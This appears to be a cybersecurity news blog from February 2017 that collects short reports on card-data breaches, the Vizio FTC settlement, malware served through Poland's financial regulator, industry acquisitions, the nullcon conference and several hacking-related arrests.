Secret Service agents have spent the days since Tverdokhlebov’s arrest opening his safe-deposit boxes. Three boxes in California were packed with $172,000 in $100 bills. A key locked in one box turned out to fit a fourth safe-deposit box in Las Vegas, where on Tuesday the feds found an additional $100,000.
“The large quantity of cash, as well as their distribution in safe-deposit boxes in different states, suggests that defendant may have concealed funds elsewhere in preparation for flight,” prosecutors wrote, urging that Tverdokhlebov be kept in jail.
Tverdokhlebov’s attorney, William Cummings, countered in a filing Thursday that his client is legitimately employed in Los Angeles and that the charges in the Virginia indictment are old.
Cummings also implied that with every cash-filled safe deposit box the feds find, his client becomes an even better candidate for pre-trial release. “The defendant, if he were on release, could now not go to Las Vegas to access that money,” he wrote.

nullcon Information Security Conference 8Bit, Goa 2017



nullcon‍ was founded in 2010 with the idea of providing an integrated platform for exchanging information on the latest attack vectors, zero day vulnerabilities and unknown threats. Our motto - "The neXt security thing!" drives the objective of the conference i.e. to discuss and showcase the future of information security and the next-generation of offensive and defensive security technology. The idea started as a gathering for researchers and organizations to brainstorm and demonstrate why the current technology is not sufficient and what should be the focus for the coming years pertaining to information security. In addition to security, one of the section of the conference called Desi Jugaad (Hindi for "Local Hack") is dedicated to hacking where we invite researchers who come up with innovative security/tech/non-tech solutions for solving real life challenges or taking up new initiatives.

The nullcon conference is a unique platform for security companies/evangelists to showcase their research and technology. Nullcon hosts Prototype, Exhibition, Trainings, Free Workshops, null Job Fair at the conference. It is an integrated and structured platform, which caters to the needs of IT Security industry at large in a comprehensive way.

The event consists of 25 speeches and 11 training sessions, which cover all major topics of IT security industry. The conference is created for security companies/enthusiasts so they can showcase the most up to date research and technology on the topic. The shared knowledge is usually used afterwords within the organizations. Moreover, we host ExhibitionFree WorkshopsCTF Hacking competitionsJob FairBlackShield Awards and other events at the conference.

The Keynote will be addressed by Joshua Pennell, Founder & President, IOActive, following which we would have talks by various international security researchers on topics such as, ATM Hackings, Drone Hijacking, Telecom Protocol Security, Blockchain issues, Cloud Security, Bug Hunting, Social Engineering, Botnets and lots more.

With nullcon 8-bit edition we have made a lot of changes bringing the conference to the next level:
  • We anticipate to have 1000 people,
  • Additional DevOps Security Track,
  • New Trainings on Cloud Security, IoT, Infrastructure, Hardware Security,
  • New CXO Panel session,
  • Larger exhibition vendor area etc.

Nullcon Goa 2017 Dates:
  • Training - 28th Feb to 2nd March 2017
  • Conference - 3rd to 4th March 2017

New Venue:
Holiday Inn Resort, Mobor Beach, Cavelossim, Salcette, Goa - India.
Registartion is still open! Get your pass here: http://nullcon.net/website/register-goa.php

Thursday 9 February 2017

Closing the Loop in Cyberspace

CyberBit, the cyber technology company established by Elbit Systems under the direction of Adi Dar, implements in cyberspace a proven military concept: prompt loop closure to contain cyber events. For some time now, the cyber technology industry has been discussing the need to operationalize the cybersecurity process. The idea here is that a company that accomplished that objective on the battlefield would be able to accomplish it in cyberspace, too.
"CyberBit implements a holistic cybersecurity concept, based on four primary elements: intelligence gathering, data analysis, command & control and an enforcement capability," explains Adi Dar, CyberBit's CEO. "Elbit Systems have been involved in cyber technology for more than 15 years. It began with the acquisition of Elron Telesoft in 2001 and the establishment of Elbit's ISTAR Division, and evolved in April 2015 into CyberBit. Back then, they did not call it cyber technology, but the foundations had been cast years ago.
"The establishment of CyberBit followed a management decision to offer Elbit Systems' cyber technology capabilities to the civilian market, too, and to leverage Elbit Systems' cyber technology assets for that end. In the civilian world, you must operate differently. You need unsupervised freedom of operation, you have to develop a brand, stay innovative and respond promptly. In the defense/security world, Elbit is a solid brand, but that does not help if you want to sell a cybersecurity solution to a bank, an insurance company or a retail chain.
"For this reason, CyberBit is made up of two sub-units – one sells products to the HLS world and the other to the civilian world. The company that sells to the civilian world is unsupervised and its employees do not have to undergo a security vetting process. It uses a separate IT network and is run like any other cyber technology company around the world."
"One of the moves we made was the acquisition, in July 2015, of the cyber technology division of the NICE Company," explains Dar. "This move had matured three months after the establishment of CyberBit. The idea was to acquire the assets of the NICE Company in the field of intelligence gathering, combine them with Elbit's knowledge management and C3 capabilities, and combine all of that with the assets of the 4C Company Elbit had acquired back in 2011."
One of the solutions CyberBit offers belongs in the EDR (Endpoint Detection & Response) category. It is a client installed in a core-level workstation/server, under the operating system. It "sees" and records a lot of the processes taking place in the computer. The data from all of the clients throughout the organization are collected by a Big Data system, and used to run algorithms that search for patterns indicating a cyberattack.
"Each workstation produces dozens of megabytes per day," explains Dar. "If the organization has 100,000 workstations, it will amount to a lot of data that should be managed and analyzed every day. Not many companies in this field can accomplish that on such a scale.
"The ability to analyze the data from all of the workstations in the network makes it possible to identify a pinpoint attack against a specific workstation, and mainly to identify attacks where the attacker moves laterally through the network. Pursuant to the identification stage, the client may be issued with an enforcement command to kill processes in that workstation. In this way, the threat is contained very quickly. The combination of a client at the core level and Big Data capabilities gives us an advantage in the market."
Along with collection of intelligence from the clients fitted to the organization's workstations and servers, CyberBit offers legitimate intelligence gathering solutions, which include Open Source Intelligence (OSInt) and intelligence gathering capabilities for stationary or mobile communication networks, including satellite communication networks. "Combining all of these activities enables us to provide a systemic intelligence gathering solution – from the organization and from the outside environment. This improves the organization's ability to identify cyberattacks," says Dar.
Another solution is a SOC (Security Operations Center) management system: a system for managing the organizational cybersecurity operations center, intended to provide transparency into the organization's networks. The SOC should effectively manage the response to cyberattacks.
"This product enables automation of the SOC procedures," explains Dar. "These centers are normally manned by people just starting out in the world of cyber technology. They come to work there for a short period of time, hone their professional skills and leave. Moreover, major organizations deploy multiple SOCs at various locations around the world, so as to avoid overtime pay. It is known as 'Follow the Sun'. When the sun sets over one country, it rises over another country, and the management of the SOC follows the sun.
"If you combine these two elements vis-à-vis the fact that a high-quality cyberattack against an organization can last months, you will realize that without automation of the SOC procedures, the organization will not be equipped to cope effectively with such an attack. At this point, Elbit's experience in the C3 world comes into the picture. In the end, you are talking about numerous sensors that produce logs, and you need an application with a rules engine to provide the analysts at the SOC with a scale of priorities."
Another field of activity in which CyberBit is involved is cybersecurity for SCADA (Supervisory Control and Data Acquisition) infrastructures. These are assets the 4C Company had brought into Elbit Systems. "In SCADA networks, we perform passive monitoring along with the ability to stop inline attacks," says Dar. "The OT system world is simpler than the IT world as it has a finite number of protocols. It is a more structured world. At the same time, since the Stuxnet worm was identified and the electrical infrastructure of the Ukraine was attacked in December 2015, there has been more understanding of the significance of the threat. This is the reason why many countries are developing regulation in the field of SCADA security."

Replacing Anti-Virus Software

According to Dar, one of the threats that currently challenges the industry is ransomware. "This is a threat that compels you to resort to real-time blocking, even before the encryption, but it is very difficult to catch before the encryption. If you catch it after the encryption, you will have no guarantee about being able to save the information – and that is a fairly complex challenge.
"Ransomware changed the demands of the clients, and now they want response – not just detection. It is nice if you managed to detect it, but what will the organization do with it? And in order to respond, you need a client on the computer. That leads to a war over the clients. I had a meeting with an information security manager of a bank, who told me that they have nine clients on the computer. The battle today is over the 'real estate' in the workstation or server. Ransomware can damage a large number of end stations, and even servers. We know how to contain the infected devices so as to prevent the threat from spreading. According to some of the estimates in the market, this technology will replace anti-virus software."
Unlike the defense industry, which has a well-defined and relatively 'niche type' target market, with civilian cybersecurity solutions the market is endless. Private clients, SMBs or major clients in every country around the world already need or will need cybersecurity solutions.
"There will be no escaping the transfer of cybersecurity solutions to the cloud," says Dar. "If I could place the EDR in the cloud, while at the same time installing it in all of the client's devices, I would have solved a major percentage of the client's problems. One must understand that smaller organizations do not have an information security team or an SOC. Cybersecurity for SMBs (Small to Medium Businesses) must be provided through their cloud information security service provider or MSSP (Managed Security Service Provider). I am referring to cybersecurity services for organizations with a personnel of 100-150 employees or less that cannot afford to finance more expensive solutions.
"CyberBit is not there yet, but we understand that this is the right direction. We can see a trend of transition to the cloud, although the truly sensitive information as well as the client of the EDR are not being transferred to the cloud yet. That will take time. Soon we will have to make a decision as to whether we want to remain a provider of technology exclusively, or provide cloud services as well.
"It is important to note that CyberBit does not compete against defense/security industries that offer cyber technology products, but against civilian cyber technology companies. For a defense/security industry it is inconceivable to provide cloud services to SMBs. For us it is a very realistic question. It is a part of our future. Elbit Systems established CyberBit in order to develop a civilian cyber technology industry, and the future of that industry is in the cloud and in mass-produced solutions, like anti-virus software. That's where the money is."

InterContinental Hotels Confirms Credit Card Breach


InterContinental Hotels Group (IHG), parent company to Crowne Plaza, Holiday Inn and Kimpton Hotels and Resorts, confirmed on Friday a breach of payment card systems used in 12 of its hotels located in North America and the Caribbean.
According to IHG, which operates 5,000 hotels worldwide, malware was found on servers used to process credit cards. The servers were infected between last August and December; the company declined to say how many payment cards were impacted.
In a statement released Friday, IHG said it found malware installed on servers used at popular destinations such as Michael Jordan’s Steak House and Bar in Chicago, the Holiday Inn San Francisco Fisherman’s Wharf, the Copper Lounge in Los Angeles, and the Palm Bar in Aruba. A full list of locations impacted was posted by IHG.
The hotelier reported on Dec. 28 that it was investigating customer complaints of unauthorized charges on credit cards. At the time, the company said only a limited number of destinations were impacted before revealing more details on Friday.
“Findings show that malware was installed on servers that processed payment cards used at restaurants and bars of 12 IHG managed properties,” according to a statement. “Cards used at the front desk of these properties were not affected.”
According to IHG, the malware searched for magnetic stripe track data as it was being routed through servers. Track data included cardholder name, card number, expiration date and internal verification code. There is also no information provided on the strain of malware used in the attacks.
Hotels, restaurants and other hospitality outlets are frequently singled out as victims of opportunistic hackers. Last year alone there were nearly a dozen reports of card breaches. One of those breaches occurred in August and included 20 hotels run by HEI Hotels and Resorts, which owns chains Marriott, Sheraton, and Westin. Similarly, malware was used to siphon payment card data.
The prevalence of malware use to steal payment card data hit a peak in 2014 when it was at the center of several high-profile breaches, including Target and Neiman Marcus.
As recently as last November, security researchers at Trustwave said the Carbanak cybercrime gang, first discovered by Kaspersky Lab, had shifted strategy and began targeting the hospitality and restaurant industries with new techniques and malware. Part of the Carbanak tactics involved targeting hospitality call centers with elaborate ploys to get customer service representatives to accept and download emails with malicious macro-laced documents. The target was credit card data scraped from the memory of point-of-sale systems.
“We have been working with the security firms to review our security measures, confirm that this issue has been remediated, and evaluate ways to enhance our security measures,” IHG wrote in a statement regarding the breach.

Smart TV Manufacturer Vizio Fined $2.2M for Tracking Customers

Smart TV manufacturer Vizio tracked data on 11 million of its customers TVs without their knowledge or consent, the Federal Trade Commission announced this week.
The Irvine, Calif.-based company agreed on Monday to pay $2.2 million to settle charges that it collected scores of its customers’ data. While the company tracked what programs users watched it also tracked information corresponding to customers’ sex, age, income, marital status, household size, education level, home ownership and household value.
According to a complaint filed by the agency in the U.S. District Court for the District of New Jersey on Monday, Vizio tracked users through proprietary automated content recognition (ACR) software made by a subsidiary, Inscape Services. While that software has been turned on by default since 2014 on most of Vizio’s televisions, the FTC alleges that in some instances the company remotely installed it on any previously sold televisions that didn’t have the software.
The software feeds Vizio a “second-by-second” transmission on what its consumers watch, regardless of whether its on cable, on demand, a streaming device like Google’s Chromecast or Amazon’s Fire Stick, or even a DVD. According to the complaint, the software has quite the reach and is able to capture “up to 100 billion data points each day from more than 10 million VIZIO televisions.”
In addition to household demographics, the software also siphoned up technical details such as the home’s IP address, wired and wireless MAC addresses, how strong the home’s WiFi was, and even any nearby WiFi networks, the complaint (.PDF) reads.
The complaint alleges the company sold this information to third party companies who first used it to analyze the effectiveness of advertising, and then used it in targeted advertising.
“Defendants provide these third parties with IP addresses, so that the third parties can analyze a household’s behavior across devices, in order to determine, for example, (a) whether a consumer has visited a particular website following a television advertisement related to that website, or (b) whether a consumer has viewed a particular television program following exposure to an online advertisement for that program. The data is used in the aggregate to evaluate the effectiveness of advertising campaigns,” the complaint reads.
The company failed to provide users with any notice their viewing habits were being tracked. It wasn’t until March 2016 – in the midst of investigations against the company – that Vizio sent users a quick pop-up notification on their television notifying them their viewing data was being collected.
“This notification timed out after 30 seconds without input from the household member who happened to be viewing the screen at the time, and did not provide easy access to the settings menu,” the complaint reads.
Going forward the company is being asked to disclose and obtain consent for any information it collects in the future, maintain transparency when it comes to what its doing with its customers’ information, and to develop a data privacy program subject to assessment every two years.
As part of the settlement Vizio is also being asked to erase any data it may have collected before March 1, 2016. Of the $2.2 million paid to settle the matter, $1.5 million will go to the FTC, another $1 million to the New Jersey Division of Consumer Affairs, with $300,000 of that amount suspended.
Vizio, for its part, issued a press release shortly after the settlement was announced on Monday saying it was “pleased to reach this resolution” and that it set a “new standard for best industry practices,” At the same time the also company took a moment to clarify exactly what kind of customer information its ACR program gathered.
According to Jerry Huang, Vizio’s General Counsel, the program didn’t pair viewing data with personally identifiable information; instead, as the complaint specifies, it was used “in the ‘aggregate’ to create summary reports.”
“VIZIO is pleased to reach this resolution with the FTC and the New Jersey Division of Consumer Affairs. Going forward, this resolution sets a new standard for best industry privacy practices for the collection and analysis of data collected from today’s internet-connected televisions and other home devices,” stated Jerry Huang, VIZIO General Counsel. “The ACR program never paired viewing data with personally identifiable information such as name or contact information, and the Commission did not allege or contend otherwise. Instead, as the Complaint notes, the practices challenged by the government related only to the use of viewing data in the ‘aggregate’ to create summary reports measuring viewing audiences or behaviors.”
“Today, the FTC has made clear that all smart TV makers should get people’s consent before collecting and sharing television viewing information and VIZIO now is leading the way,” concluded Huang.
In the FTC’s eyes, Vizio’s statement runs counter to a securities filing previously filed by the company. In the filing, Vizio claims its data analytics program “provides highly specific viewing behavior data on a massive scale with great accuracy, which can be used to generate intelligent insights for advertisers and media content providers.”
The FTC’s Acting Chairman Maureen K. Ohlhausen said Monday that Vizio’s practices, specifically how it failed to disclose the fact it was tracking users, were unfair and deceptive.
“Evidence shows that consumers do not expect televisions to collect and share information about what they watch. Consumers who are aware of such practices may choose a different television or change the television’s settings to reflect their preferences,” Ohlhausen wrote. (.PDF) ”
The FTC filed a complaint against another major technology company, D-Link, earlier this year. In that complaint, the agency alleged the router manufacturer failed to adequately secure its wireless routers and IP cameras, something that could have potentially put its customers’ data at risk of compromise.

Wednesday 8 February 2017

Polish banks hit by malware sent through hacked financial regulator


Polish banks are investigating a massive systems hack after malware was discovered on several companies' workstations.
The source of the executables? The sector's own financial regulator, the Polish Financial Supervision Authority (KNF).
A spokesman for the KNF confirmed that their internal systems had been compromised by someone "from another country". But when it was discovered that the regulator's servers were hosting malicious files that were then infecting banks' systems, the decision was made to take down the KNF's entire system "in order to secure evidence."
According to one cyber security site that spoke to a number of banks and carried out a preliminary analysis, a number of banks confirmed that they had seen unusual network traffic and found encrypted executables on several servers. The details were rapidly shared between the group of roughly 20 commercial banks in the country and other banks started reporting the same issues.
Ironically, it is the KNF that sets cybersecurity standards for Polish banks but it is thought that a modified JS file resulted in visitors to the regulator's site loading an external JS file which then pulled down malicious payloads.
Both the KNF and the Polish government have since told local Polish media that there is no indication that people's money was touched and have given tentative assurances that no operations were affected. But they also stressed that investigations were ongoing.
The situation is being seen as the most serious ever attack on the Polish banking industry

Sophos to assimilate Invincea's intelligent machine tech to fight malware

 Robot eye opens. Image via Shutterstock
Sophos has announced a deal to acquire the core technologies of anti-malware protection outfit Invincea for $100m plus up to $20m, dependent on first-year revenues.
Invincea makes a line of signature-less endpoint procession technologies that rely on machine learning and behavioural monitoring to block malware.
Sophos plans to integrate Invincea's tech into the Sophos Central endpoint product line, before releasing revamped products later his year. The plan parallels the integration of SurfRight's technology into Sophos's product line following a smaller December 2015 acquisition.
In the 12 months to 31 March 2016, Invincea recorded billings of $13.4m, revenue of $9.8m and a loss before tax of $11.8m.
Invincea Labs, a division of Invincea that has been separately managed and operated since 2010, will be spun out prior to the acquisition and does not form part of this transaction.
Sophos expects to complete the acquisition around the end of this fiscal year. It anticipates the deal to be "broadly neutral" to its balance sheet in its first year before adding to its revenues thereafter.
Sophos CEO Kris Hagerman commented: "Invincea is leading the market in machine learning-based threat detection with the combination of superior detection rates and minimal false positives. Invincea will strengthen Sophos's leading next-gen endpoint protection with complementary predictive defences that we believe will become increasingly important to the future of endpoint protection and allow us to take full advantage of this significant new growth opportunity."

Cyberbit to Launch Cybersecurity Training Facility in Japan

Together with Ni Cybersecurity, Elbit Systems' subsidiary will launch a cybersecurity training and simulation center in Tokyo, addressing the growing cybersecurity skill shortage before the 2020 Olympics
Elbit Systems announced today that its subsidiary Cyberbit was awarded a contract from Ni Cybersecurity, the Japanese cybersecurity service provider, to launch a cybersecurity training and simulation center in Tokyo powered by the Cyberbit Range platform.
Ni Cybersecurity will set up a training facility in Toranomon, Tokyo that will address these challenges by accelerating the certification of new cybersecurity experts and helping organizations improve the skills of their existing staff, focusing on government and finance organizations. The contract, in an amount that is not material to Elbit Systems, will be performed during 2017.
The new training facility will be powered by the Cyberbit Range, a cybersecurity training and simulation platform. It enables trainees to practice in real-life settings by accurately replicating their network setup, using their actual security tools and simulating their typical network traffic. The Range provides a selection of simulated attack scenarios, including ransomware. It is the underlying platform for multiple training centers in North America, Asia and Europe.
Adi Dar, Cyberbit’s CEO said, “When there is a need to certify tens of thousands of new cybersecurity experts while improving the skills of existing ones, all within a very short timeframe, enrollment in simulated training programs is the best choice for finance, government and other organizations in Japan. I am confident that the initiative, led by Ni Cybersecurity, powered by our Range platform, will contribute to Japan’s cyber readiness for the 2020 Olympic Games, and for years to follow."
Takeshi Mitsuishi, President and CEO of Ni Cybersecurity, said, “We selected the global leading cyber range platform, and we’re taking it to the Japanese market by opening our new training center in Tokyo, launching in Toranomon. Based on the global success of the Cyberbit Range, our customers can expect exceptional quality training, faster certification, and overall more qualified and skilled cyber security personnel.”

Sunday 5 February 2017

AFTER KASPERSKY, FSB OFFICIALS FACE TREASON CHARGES


Two of Moscow’s top cybersecurity officials are facing treason charges for cooperating with the CIA. The accusations further highlight intrigue to a mysterious scandal that has had the Moscow rumour mill working in overdrive for a past week now, and come not long after US intelligence accused Russia of interfering in the US election and hacking the Democratic party’s servers.

Sergei Mikhailov was deputy head of the FSB security agency’s Centre for Information Security. His arrest was reported in a series of leaks over the past week, along with that of his deputy and several civilians.

According to earlier reports in the Russian media, Mikhailov was arrested some time ago, in theatrical fashion, during a plenary session of the top FSB leadership: a bag was placed over his head and he was marched out of the room, accused of treason.

His deputy, Dokuchayev, is believed to be a well-known Russian hacker who went by the nickname Forb, and began working for the FSB some years ago to evade jail for his hacking activities. Together with the two FSB officers, Ruslan Stoyanov, the head of the computer incidents investigations unit at cybersecurity firm Kaspersky Lab, was also arrested several weeks ago.

Kaspersky confirmed last week that Stoyanov had been arrested and was being held in a Moscow prison, though it said the arrest was not linked to his work for the company. Interfax said four people had been arrested and a further eight were potential witnesses in the case.

On Tuesday, Life, an online news portal with close links to the security services, reported that FSB agents had searched Mikhailov’s home and dacha and found more than $12m (£10m) in cash stashed in various hiding places.

Two arrested in London over hacking of US cctv systems days before President Trump’s inauguration took place


Detectives have arrested two people in London on suspicion of hacking Washington's CCTV system ahead of President Donald Trump's inauguration.
The home of a British man, aged 50, and a Swedish woman, also 50, was raided in Streatham, south London on January 19.
It comes as storage devices which record data from police surveillance cameras in the American capital were allegedly compromised between January 12 and 15.
 
Hackers disabled 123 of 187 security cameras in Washington, starting a major security incident.
It is believed the first cyber attack could have been a dry run with another potentially planned during the presidential handover.Donald Trump

CCTV security was hacked days before the inauguration Credit: AP/AP
The National Crime Agency said: "Enquiries are ongoing and we are unable to provide further information at this time."
The couple have been bailed until April. Neighbours of the man and woman arrested said they keep themselves to themselves.
Police cars and officers raided the residential road at around 5.30pm. A woman who lives near the raided house, said: "My sister had just come back from work and saw a couple of police cars around 5.30pm.
"Then later more cars turned up and we could see the blue lights filling the whole house.
"They keep themselves to themselves.
"This is a quiet street and there never any trouble round here."
Another neighbour, who did not want to be named, said: "I saw a lot of police arrive a few weeks ago.
"I don't know what it was about, but I saw them go in the house.
"I've spoken to the guy a few times, he seems really nice and we often have a chat in the street."